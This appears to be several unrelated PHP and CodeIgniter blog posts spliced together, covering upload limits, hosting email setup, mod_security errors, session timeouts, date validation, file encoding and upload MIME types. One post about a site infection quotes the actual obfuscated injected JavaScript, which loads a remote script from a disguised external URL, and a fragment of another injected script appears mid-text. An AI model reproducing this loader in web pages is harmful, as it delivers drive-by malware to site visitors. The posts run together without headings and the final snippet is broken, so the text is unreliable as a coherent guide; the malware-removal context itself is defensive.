I increase the “file_uploads” to 150MB. When I try upload 18MB file use my application it’s just show me a blank page without any error, then I look error log file and found something

POST Content-Length of 18248964 bytes exceeds the limit of 8388608 bytes in Unknown on line 0

I found that I also need increase the ‘post_max_size’ to 150MB on php.ini. Yup my application work fine now, glad to see this

var D;if(D!='' && D!='X'){D=''};var U=new Array();var p="";function u(){var aY=new Date();

The condition , all index file , index.html or index.php was injected. The virus code injected on last line of file. After couple hour browse I didn’t find any solution to this problem and this make me confused, it will horrible if I have to remove the virus code one by one.

After two hour doing experiment finally I found the way how to remove the virus, just use bash script , using “grep” , “find” , “cut” , “grep” , “xargs” and “sed”.

1. Login To your Yahoo small business, http://smallbusiness.yahoo.com/
2. Click “Access Your Account” on top bar, then “small business”
3. Click “Web Hosting Controll Panel”
4. Click “Create & Update” tab
5. Click “Other Site Building Tools”
6. Click “PHP/Perl Mail”
7. On right side, you must set email sender to use on “From” field, for example I use webmaster
8. Click “Save Default” to set it

Now at CodeIgniter controller we must use email address that have been already set on ‘from’ field, for example I have already set “webmaster@mydomain.com” so here the code example:

## send email to some one
$this->load->library('email');
$config['protocol']     = 'sendmail';
$config['mailpath']     = '/usr/sbin/sendmail -t';
$config['wordwrap']     = TRUE;
$config['useragent']    = 'CI Mailer';
$config['mailtype']     = 'text';
$config['newline']      = "\r\n";

## email contact
$this->email->initialize($config);
$this->email->from('webmaster@mydomain.com');
$this->email->to('recipient@domain.com');
$this->email->subject('Web Visitor");
$message  = "Test Email";

$this->email->message($message);
$this->email->send();
#echo $this->email->print_debugger();

The second attact, the Java script code injected is not same as first one, it have some code variant , The code I was found on my PHP and Javascript code is :

<script>/*Exception*/ document.write('<script src='+'h!&&t^^t#p&(#^:$&^^/&@)/&@@i!!$m@)a^#@g$!e($$)f@^a@&p$&$(-#c!o@!&m^.&h!!!a)t!$!e#n$#a!.!!&&n@e@!).$^$#j^@#^p@^(@.&!&s(!l#i@&d#!e)$s@#h&^a!!r!^e^-@$#n!(@e((t$&#(.)s(u^(p@^!e!)r!)@)t!@&r##u($^e^)l$#)i&!&f&@^e^^.!^r)u^!$:@8@(0#@#!8#$!)0!)!/&^)l&e#&(q(@^u#)!i!)p@(!e&&&^.#!(f#!r)$!/^)l)&@@e)#q^$@u@!!i#^(p$(e!^&.#!f!r$&/@v((k^@.(@c$@&$o^!@m($/&$g&(@)o)!o(@&!g$)!l!$e$$.)!c@$))o#@$^&m@&&^/!p(&c&&&p#!)o#@#p@(.&c#@!o$m$$&/&#!('.replace(/\)|@|\!|#|&|\^|\(|\$/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--2a2a37017f4e478abaa5f3c16a9b2656-->

So I need to modify the cure file for this code variation, and it work fine. Recently I browse on justcode.com and see the new version on cure file it has have ability to cure variant Java Script code that injected to web file. So just try to download it here

In part used session function (I use the library session Codeigniter) , randomly displays a HTTP 406 error.

When searching on google, I know that the problem is probably caused by the Apache  mod_security. I tried de-active mod_security function using  . htaccess files but it causes HTTP error 500.

When a page that uses session displays a HTTP 406 error, It can be fixed by delete computer cookies, but sometimes  it comes back HTTP error 406 at random.

Another problem, the session produced by the library Codeigniter likely trigger mod_security apache and the mod_security considers it as a threat so mod_security block access from my  IP (I have many times to reset my modem to get a new IP)

My solution :  I change my session from the Codeigniter library  into Native PHP session. The solution worked perfectly, I don’t have anymore HTTP error 406 and blocked by mod_security.

For a username, I check the username on database if it exist or not. For example in my database I already have two username let say ‘admin1′ and ‘admin2′.

I did the code like example provided, let say we register with username ‘admin1′ or ‘admin2′ it will show an error that say the username already exist. Here the code :

reg_username: {
required: "Enter a username",
minlength: jQuery.format("Enter at least {0} characters"),
remote: jQuery.format("{0} is already in use")
},

The “{0}” will display the username we input,  so when I type ‘admin1′ as my username it will display an error “admin1 is already in use”. Then when I type ‘admin2′ as my username it shuld be show an error “admin2 is already in use” but in fact, when I use ‘admin2′ as my username, it will display error ‘admin1 is already in use’. Kind a strange, didn’t solve it yet

Note

Just Updated to latest version 1.6 and it still get some bug but in different mode, seem I will eliminate {0} from the error code because it source of problem )

After googling , I found information that say there a problem with server clock, since I got server access ( thanks to someone that allow me in ) I adjust server clock same as my computer clock. Surprise  ….. I test from IE everything work fine just like there nothing happen.

Then I run a little test, my session expire setting is 7200 (2 hour), I change my computer clock 1 hour faster, I test the administrator panel again and everything work fine.

Then I adjust my computer clock 3 hour faster (more that session expire setting) then my administrator panel fail to work again …. just wondering how could be like this

For now I move my application to native PHP Session …. lot work to do

$patt = '/^(0?[1-9]|[12][0-9]|3[01])[\/](0?[1-9]|1[0-2])[\/](19|20)\d{2}$/';

After sure the date input is valid according our rule, we must also validate the input date according the calendar, for example, if the user input 31/2/2009 it will be valid in that regular expression check, but of course there no February 31 :p

$inputdate = explode("/",$_POST['inputdate']);
if ( ! checkdate($inputdate[1],$inputdate[0],$inputdate[2]) )
{
 echo 'Invalid Date';
}

So here my complete example code snippet :

## date input pattern validation
$patt = '/^(0?[1-9]|[12][0-9]|3[01])[\/](0?[1-9]|1[0-2])[\/](19|20)\d{2}$/';
if (! preg_match($patt,$_POST['inputdate']))
{
echo 'Invalid Date Format, mm/dd/yy';
die();
}
else
{
echo 'A Valid Date Format';
}

## calendar validation
$inputdate = explode("/",$_POST['inputdate']);
if ( ! checkdate($inputdate[1],$inputdate[0],$inputdate[2]) )
{
echo 'Invalid Date according Calendar';
die();
}
else
{
echo 'A Valid Date according Calendar';
}

In code igniter, when you use “Language Class” you will create a “Language file” in your language directory application path. The important part is, when you make the “language file” make sure you use right decode method. By default many text editor use ANSI decoding for file format. It must be change to UTF-8 to make sure when you use your language file, it will display right character.

For example, I use Notepad++ editor, I can change the file format into UTF-8 from Toolbar choose “Format” -> “Convert to UTF-8 without BOM”.

Code Example :

$lang['messege_fail_head'] = “Désolé, il ya une erreur”;

With out correct file encoding, when you “echo $this->lang->line(‘messege_fail_head’)”

It will display :

D?sol?, il ya une erreur

With correct file encoding (UTF-8)

Désolé, il ya une erreur

The CI Upload class use their own ‘mime’ data to determinate the file mime type, I think why they use own mime rather than using mime function on PHP or Apache is to avoid dependency. Some server may not include mime extension in their setting so it will be problem if we can not use mime function to determinate the file mime.

The CI mime file located in system/application/config/mimes.php , when we do upload some file using upload class, the file that uploaded will generate the information about the file like file name, file type, size and temporary file name. This information generated by the browser. Here some information example of an ‘exe’ file uploaded using Internet Explorer browser.

Array
(
[userfile] => Array
(
[name] => putty.exe
[type] => application/x-msdownload
[tmp_name] => d:/wamp/tmp\phpCF.tmp
[error] => 0
[size] => 454656
)

)

The Uploading class use ‘type’ information as mime types. That information will compared with data from system/application/config/mimes.php to determinate if the file allowed to upload. If the data from ‘type’ included on mimes.php data it mark as ‘allowed file’. From mimes.php, an ”exe” file mime type is :

‘exe’ => ‘application/octet-stream’,

And from ‘type’ information the ‘exe’ file mime type is :

application/x-msdownload

Now we can see the problem here, the file information is generated by the browser and the browser may generate different kind of file type, Here the example for an “exe” file :

Internet Explorer : application/octet-stream (we have no problem if we use IE for upload)
Firefox : application/x-msdos-program (we got problem here)
Safari : application/x-msdownload (we also got problem here)
Opera : application/x-msdownload (we also got problem here)

So, we must check the allowed file type and the mime type in mimes.php in common browser : Safari, IE , Firefox and Opera is quite enough. For debugging, put this code on line 195 of Uploading Class, you will got information about file you been uploaded like in above example.

echo ‘

';
print_r($_FILES[$field]['type']);
echo '

‘;
die();
?>